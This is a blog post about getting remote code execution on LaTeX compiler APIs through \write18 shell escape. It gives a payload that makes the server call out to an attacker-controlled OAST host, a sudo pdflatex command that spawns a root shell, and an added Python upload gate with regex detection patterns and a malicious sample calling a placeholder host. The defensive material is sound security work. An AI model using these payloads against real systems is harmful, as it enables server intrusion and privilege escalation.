DEV Community

Blue Byte

Easy RCE with LaTeX via file upload

Who has never analyzed a website, triggered an error, and discovered that the server was running in debug mode, revealing environment variables (other URLs, database connection strings, even credentials) along with routes to API endpoints and their Swagger UI documentation? Cool, and who has come across something called "LaTeX Compiler API 1.0" among those endpoints?

LaTeX is a markup language for composing and styling documents in a descriptive manner based on commands (macros). Systems that need to turn it into other file formats such as PDF or DVI usually integrate a TeX distribution and call an engine such as pdflatex.

The interesting thing is that in addition to describing documents, TeX is a full programming language: you can write functional programs in it and, when shell escape is enabled, even execute shell commands. In the case of the Compiler API, the /compile route normally accepts TeX files via a POST request.

[Screenshot: LaTeX Compiler API 1.0]

It may be possible to obtain a reverse shell. A first step is sending a payload like the one below, which makes the server call out to an out-of-band (OAST) domain you control, confirming that commands execute:

```latex
\usepackage[utf8]{inputenc}

\immediate\write18{curl redacted.oast.fun}
```

It is worth noting that execution is only triggered when shell escape is enabled, for example with the -shell-escape flag or shell_escape=t in texmf.cnf. TeX Live's default is restricted mode (shell_escape=p), which only allows the short allowlist in shell_escape_commands, so an arbitrary curl would be refused there. Once inside the server, you may be able to escalate privileges if pdflatex can be run through sudo:

```bash
sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
```
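An upload gate for a /compile endpoint like this one, written from the defender's side as an added example (it is not the post's code and not any real "LaTeX Compiler API"): it flags the shell-escape primitives in an uploaded .tex file for the audit log and, more importantly, invokes pdflatex with -no-shell-escape so that \write18 is inert even if texmf.cnf enables shell escape globally. The function names, the regexes, the minimal environment and the two sample documents are my own constructions; the pdflatex flags themselves (-no-shell-escape, -halt-on-error, -interaction=nonstopmode, -output-directory) are real TeX Live options.

```python
import re
import shutil
import subprocess
from pathlib import Path

# Constructs that only become dangerous when shell escape is enabled: the
# \write18 primitive from the post (with or without \immediate, and with the
# whitespace TeX allows between \write and 18), the \csname spelling of the
# same primitive, and TeX Live's piped input/output forms such as \input{|"cmd"}.
SUSPICIOUS = {
    "write18": re.compile(r"(?:\\immediate\s*)?\\write\s*18\b"),
    "csname_write18": re.compile(r"\\csname\s*write\s*18\s*\\endcsname"),
    "piped_io": re.compile(r"\\(?:input|openin|openout)\b[^|\n]*\|"),
}


def scan_tex(source: str) -> list:
    """Return one finding per suspicious construct, with its line, for the audit log.

    Deliberately does not strip % comments: catcode changes can turn a
    'comment' back into live code, so a conservative scanner flags them too.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in SUSPICIOUS.items():
            if pattern.search(line):
                findings.append({"rule": rule, "line": lineno, "text": line.strip()})
    return findings


def build_compile_command(tex_path: Path, out_dir: Path) -> list:
    """Argument vector for a hardened pdflatex run.

    -no-shell-escape overrides any shell_escape setting in texmf.cnf, so
    write18 and piped input are refused even if they were enabled globally.
    nonstopmode and halt-on-error keep the engine from waiting for terminal
    input on a malformed upload; output-directory confines generated files.
    """
    return [
        "pdflatex",
        "-no-shell-escape",
        "-halt-on-error",
        "-interaction=nonstopmode",
        "-output-directory", str(out_dir),
        str(tex_path),
    ]


def compile_upload(source: str, work_dir: Path, timeout_s: int = 30) -> dict:
    """Scan, then compile with shell escape disabled; the engine flag is the real control."""
    findings = scan_tex(source)
    if findings:
        return {"status": "rejected", "findings": findings}
    if shutil.which("pdflatex") is None:  # assumption: engine may be absent on this host
        return {"status": "no-engine", "findings": []}
    work_dir.mkdir(parents=True, exist_ok=True)
    tex_path = work_dir / "upload.tex"
    tex_path.write_text(source, encoding="utf-8")
    proc = subprocess.run(
        build_compile_command(tex_path, work_dir),
        capture_output=True, text=True, timeout=timeout_s,
        # Minimal environment: the engine never sees the API's own secrets
        # (DB URLs, tokens), the same values debug mode was already leaking.
        env={"PATH": "/usr/bin:/bin", "HOME": str(work_dir)},
    )
    status = "compiled" if proc.returncode == 0 else "engine-error"
    return {"status": status, "findings": [], "log": proc.stdout[-2000:]}


# Constructed sample uploads (not real traffic). The callback host is a placeholder.
MALICIOUS_SAMPLE = r"""\documentclass{article}
\begin{document}
\immediate\write18{curl callback.example.invalid}
\input{|"id"}
\end{document}
"""

BENIGN_SAMPLE = r"""\documentclass{article}
\usepackage[utf8]{inputenc}
\begin{document}
Quarterly report, nothing to see here.
\end{document}
"""

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, compile_upload(doc, Path("/tmp/latex-gate-demo") / name))
```

The scan is defense in depth only: TeX macro tricks can hide the primitive from any regex, so the -no-shell-escape flag is what actually closes the hole, and the second command in the post is a reminder never to grant pdflatex (or any TeX engine) through sudo.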

Let's face it, LaTeX doesn't have a very pleasant syntax, but the next time you encounter it in a user input field, you already know what to do, right?
